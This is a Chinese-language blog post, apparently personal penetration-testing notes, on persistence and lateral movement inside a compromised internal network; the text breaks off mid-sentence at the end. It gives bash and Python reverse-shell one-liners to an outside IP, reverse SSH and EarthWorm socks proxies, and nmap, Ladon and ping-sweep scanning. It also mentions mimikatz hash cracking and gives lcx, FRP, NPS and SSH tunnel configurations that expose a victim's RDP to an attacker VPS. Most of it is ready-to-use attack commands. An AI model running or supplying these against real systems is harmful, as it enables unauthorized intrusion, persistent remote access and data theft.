内网横向+加固

发表于 更新于 分类于 本文字数: 2.3k 阅读时长 ≈ 4 分钟

1-加固

Reverse Shell定时任务

#定时任务&系统级或用户级自启

#反向ssh
1
ssh -R 6000:localhost:22 user@A的公网IP
#反弹shell
1
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

#python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
#使用 Zerotier / Tailscale 搭建虚拟局域网

或者使用sock代理,处于同一网络易漏扫,连接方式,下载EarthWorm

1
2
ew -s rcsocks -l 1900 -e 1200
ew -s rssocks -d xxx.xxx.xxx.xxx(公网VPS IP) -e 1200
#内存码的注入
#cs木马

2-横向

#内网探测

#探测主机+端口

详细可见另外一篇文章内网信息搜集

若使用了sock,则直接使用nmap

1
2
3
4
nmap -sn 192.168.1.0/24

#端口扫描
nmap -p 1-65535 192.168.1.100
1
2
3
4
5
6
   #ladon上传到目标系统中,通过ladon扫描内网系统
landon 192.168.200.1/24    OsScan	
#直接漏扫
landon 192.168.200.1/24 漏洞类型
#连接sock5漏扫
proxychains msfconsole

若没有,则使用ping

1
2
3
4
for ip in 192.168.1.{1..254}; do ping -c 1 -W 1 $ip &>/dev/null && echo "$ip is up"; done

#查看arp缓存
arp -a

#内网渗透

#排查服务

处于同一虚拟局域网内直接主机渗透web渗透

#排查备份

存在快照/镜像直接拷贝本地运行

#排查数据库
#排查敏感端口
#排查密码箱

尝试mimikatz解密哈希

#补充知识

详细可见—戟星安全实验室的内网隧道技术

1. lcx 隧道(针对 .exe 工具的案例)

目标机器(受控端)执行:

1
lcx.exe -slave 攻击机IP 9999 127.0.0.1 3389
  • 将本地 3389 端口的连接转发至攻击机 IP:9999。

VPS 或攻击机(监听端)执行:

1
lcx.exe -listen 9999 10000
  • 监听 9999 端口接收隧道数据,并将其转发至本地 10000 端口。

连接方式:

  • 在本机(或 VPS)通过 RDP 连接 127.0.0.1:10000,即可访问目标机器的 RDP 服务。

2. FRP (fast reverse proxy)

服务端(公网 VPS)frps + 配置

1
2
3
# frps.ini
[common]
bind_port = 7000

启动服务器:

1
./frps -c frps.ini

客户端(内网目标)frpc + 配置

1
2
3
4
5
6
7
8
9
10
# frpc.ini
[common]
server_addr = <VPS_IP>
server_port = 7000

[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 6000

启动客户端:

1
./frpc -c frpc.ini

连接方式

3. NPS(内网穿透代理)

服务端(VPS):

下载并运行:

1
./nps -c nps.conf

或安装为服务,访问 Web 控制面板配置端口转发 。

您可在 Web 界面添加 TCP 映射,如映射内网主机的 3389 端口到公网端口。

客户端(内网目标)

编辑 npc.conf,指定要连接的 server 和 key,然后运行:

1
./npc -c npc.conf

完毕后即可通过映射的公网端口访问目标内网 RDP 服务 。

对比总结

工具 架构 配置方式 优劣
lcx 客户端 ↔ VPS ↔ 本地 命令行参数 简单直接,但需两个进程
FRP frpc ↔ frps frp.ini 文件,支持多个隧道 灵活、功能丰富
NPS npc ↔ nps 支持 Web 面板配置 更方便管理,功能强大

*** 使用建议

  • 测试/临时场景:lcx 非常直接,只需一条命令即可完成。
  • 稳定/多隧道需求:推荐 FRP,支持多个端口,配置灵活,兼容性广。
  • 可视化管理/复杂映射:NPS 带 Web 界面,适合多人协作和频繁配置调整。

扩展:SSH隧道示例(通用):

客户端执行:

1
ssh -R 6000:localhost:3389 user@VPS_IP
  • 将内网端 RDP 3389 转发到 VPS 的 6000 端口。

在 VPS 使用 localhost:6000 即可访问目标。

#内网穿透-总结

说白了,内网穿透就是一个端口映射问题,